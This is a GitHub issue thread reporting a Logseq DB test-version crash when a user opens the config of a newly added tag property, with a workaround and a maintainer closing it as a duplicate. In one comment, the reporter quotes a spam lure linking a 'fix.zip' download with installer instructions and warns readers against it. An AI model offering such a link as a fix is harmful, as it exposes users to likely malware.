### ISSUE TITLE
Accessing a properties config page on a newly created property crashes logseq

### ISSUE THREAD

**Issue by Zyrohex** [logseq/db-test#39] opened 2024-08-23 13:05 UTC
### Search first

- [X] I searched and no similar issues were found

### What Happened?

While defining a new tag and assigning a new property called "Requirements", right after adding it to the tag, I went to configure the property which lead to logseq crashing.

### Reproduce the Bug

1. Create a test graph
2. Create a new block and assign a tag called "#Project"
3. Navigate to the "#Project" page
4. Configure the tag and add a new property called "Requirements"
5. Now try left or right-clicking on the newly added property "Requirements" and notice how it crashes Logseq. If you refresh and try again, the app will crash again. There is one work around which I list below and demonstrate in the video.

### Expected Behavior

Should be able to access the properties config screen on a brand new property.

### Screenshots

https://github.com/user-attachments/assets/eebae12d-b75c-4ffd-8593-75ae66a544cd

### Browser, Desktop or Mobile Platform Information

Losgeq DB Test Version
Commit = https://github.com/logseq/logseq/commit/652de8d

### Additional Context

The one way you can work around the issue is after you define the property on the tag, go back to your node and click inside the "Requirements" node section to add some text to that property, once this initializes, you can then access the properties configuration screen with no issue. The video listed above shows that workaround.

### Are you willing to submit a PR? If you know how to fix the bug.

- [ ] I'm willing to submit a PR (Thank you!)

**Comment by Zyrohex** [comment] 2024-08-23 13:09
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

Anyone looking at this issue, do NOT download this file. This comment needs to be removed/deleted.

**Comment by logseq-cldwalker** [comment] 2024-08-23 15:06
Hi. This looks like a dupe of #38 so closing this in favor of it. If you want to try, a fix has been pushed and should be up on test.logseq.com in about ~10m

**Closed by logseq-cldwalker** 2024-08-23 15:06 UTC
Labels: bug
